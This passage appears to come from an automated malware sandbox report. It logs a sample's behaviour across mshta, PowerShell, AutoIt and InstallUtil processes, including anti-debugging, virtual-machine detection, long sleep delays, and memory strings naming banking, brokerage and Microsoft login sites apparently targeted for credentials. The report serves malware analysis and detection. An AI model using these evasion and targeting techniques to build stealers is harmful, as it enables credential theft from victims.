                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004C4005
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_004CC2FF
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_004C494A
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CCD14 FindFirstFileW,FindClose,11_2_004CCD14
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_004CCD9F
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004CF5D8
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004CF735
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_004CFA36
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004C3CE2
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133203D FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,11_2_0133203D
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01332145 FindFirstFileA,GetLastError,11_2_01332145
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0132F96D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,11_2_0132F96D
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_009E4005
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_009EC2FF
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E494A GetFileAttributesW,FindFirstFileW,FindClose,14_2_009E494A
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_009ECD9F
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009ECD14 FindFirstFileW,FindClose,14_2_009ECD14
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_009EF5D8
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_009EF735
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_009EFA36
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_009E3CE2
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_017568AD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,14_2_017568AD
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_017541DD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_017541DD
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_017569B5 FindFirstFileA,GetLastError,14_2_017569B5
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00475D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00475D13
                    Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 53914Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57095Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 48518Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31082Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33223Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 55549Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 40624Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58882Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 47207Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35191Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 48010Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 44265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 51889Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 32287Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31902Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36950Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 52285Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 48178Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 50028Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 52309Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57961Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36117Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 43446Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 50848Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 48112Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 49302Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 52005Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 43571Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: updater.exe, updater.exe, 0000000B.00000002.2233117530.0000000003AA6000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2232683443.0000000001328000.00000040.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2226130630.0000000001354000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227146321.0000000001385000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2226395944.0000000001382000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2226395944.0000000001329000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227013081.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227434795.000000000135A000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2225743067.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2227434795.000000000137E000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exeBinary or memory string: microsoft hyper-v video
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: mshta.exe, 00000005.00000003.2306322937.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306117201.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2307115085.000001965B638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2293225799.000001965B638000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3768615350.0000019B58E54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: mshta.exe, 00000005.00000002.2306996383.000001965B5E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294457547.000001965B5E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2306370988.000001965B5E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdClass
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: AutoIt3.exe, 00000010.00000003.2425868153.000000000102F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: InstallUtil.exe, 0000000D.00000002.4521990116.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTrus
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: ssh.exe, 00000000.00000002.2310011759.000002B659089000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2286266487.00000186D0B1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: mshta.exe, 00000005.00000003.2306370988.000001965B5B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2306996383.000001965B5B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2294457547.000001965B5AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP'`[
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: powershell.exe, 00000007.00000002.2286266487.00000186D0B28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: svchost.exe, 00000006.00000002.3766781304.0000019B5362B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: InstallUtil.exe, 0000000D.00000002.4537536792.0000000003F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01340E2F LdrInitializeThunk,11_2_01340E2F
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004D45D5 BlockInput,11_2_004D45D5
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00475240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00475240
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00495CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00495CAC
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004DC6D9 LoadLibraryA,GetProcAddress,11_2_004DC6D9
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01346B12 mov eax, dword ptr fs:[00000030h]11_2_01346B12
